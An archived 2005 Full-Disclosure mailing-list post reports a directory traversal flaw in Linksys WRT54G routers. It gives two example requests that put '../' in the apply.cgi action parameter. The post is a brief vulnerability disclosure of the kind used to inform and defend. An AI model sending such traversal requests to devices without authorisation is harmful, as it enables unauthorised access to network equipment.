[Full-disclosure] WRT54G directory trasversial vulnerability

From: Shell (shell6_at_gmail.com)
Date: 10/12/05

Next message: TheGesus: "Re: [Full-disclosure] Nessus becoming closed. [was: Call to participate]"

Previous message: Advisories_at_eeye.com: "[Full-disclosure] [EEYEB20050803] - Windows UMPNPMGR wsprintfW Stack Buffer Overflow Vulnerability"
Next in thread: Thierry Zoller: "Re: [Full-disclosure] WRT54G directory trasversial vulnerability"
Reply: Thierry Zoller: "Re: [Full-disclosure] WRT54G directory trasversial vulnerability"
Reply: Thierry Zoller: "Re: [Full-disclosure] WRT54G directory trasversial vulnerability"
Reply: Barrie Dempster: "Re: [Full-disclosure] WRT54G directory trasversial vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 12 Oct 2005 16:36:31 -0400
To: full-disclosure@lists.grok.org.uk

I just found a vulnerability in Linksys WRT54G routers.

It loads the page after action

http://192.168.1.1/apply.cgi?action=../ returns the setup page
http://192.168.1.1/apply.cgi?action=../blah returns that the file does not exist
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Next message: TheGesus: "Re: [Full-disclosure] Nessus becoming closed. [was: Call to participate]"

Previous message: Advisories_at_eeye.com: "[Full-disclosure] [EEYEB20050803] - Windows UMPNPMGR wsprintfW Stack Buffer Overflow Vulnerability"
Next in thread: Thierry Zoller: "Re: [Full-disclosure] WRT54G directory trasversial vulnerability"
Reply: Thierry Zoller: "Re: [Full-disclosure] WRT54G directory trasversial vulnerability"
Reply: Thierry Zoller: "Re: [Full-disclosure] WRT54G directory trasversial vulnerability"
Reply: Barrie Dempster: "Re: [Full-disclosure] WRT54G directory trasversial vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: [Full-disclosure] WRT54G directory trasversial vulnerability
... > I just found a vulnerability in Linksys WRT54G routers. ... > It loads the page after action ... the system and worth patching though. ...
(Full-Disclosure)
RE: 2 servers, 1 website, security issue
... Unfortunately, I can't get access to that setup again until tomorrow, but ... info is stored in appsettings, so my page loads an IFrame with the url.. ...
(microsoft.public.dotnet.framework.aspnet.security)
Setup for Word-Addin (C#)
... On Machines having only the .net Framework installed, ... plugin isn't loaded. ... First I tried to include the office.dll in the setup project. ... loads but the function called by a button, ...
(microsoft.public.office.developer.com.add_ins)
Re: Application EXE Error
... SP> called "setup" configures the system and loads the menu), ... SP> .exe file displays the menu for about half a second and the application ... Eric den Doop ...
(microsoft.public.fox.programmer.exchange)
Re: [Full-disclosure] WRT54G directory trasversial vulnerability
... S> It loads the page after action ... S> http://192.168.1.1/apply.cgi?action=../ returns the setup page ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure)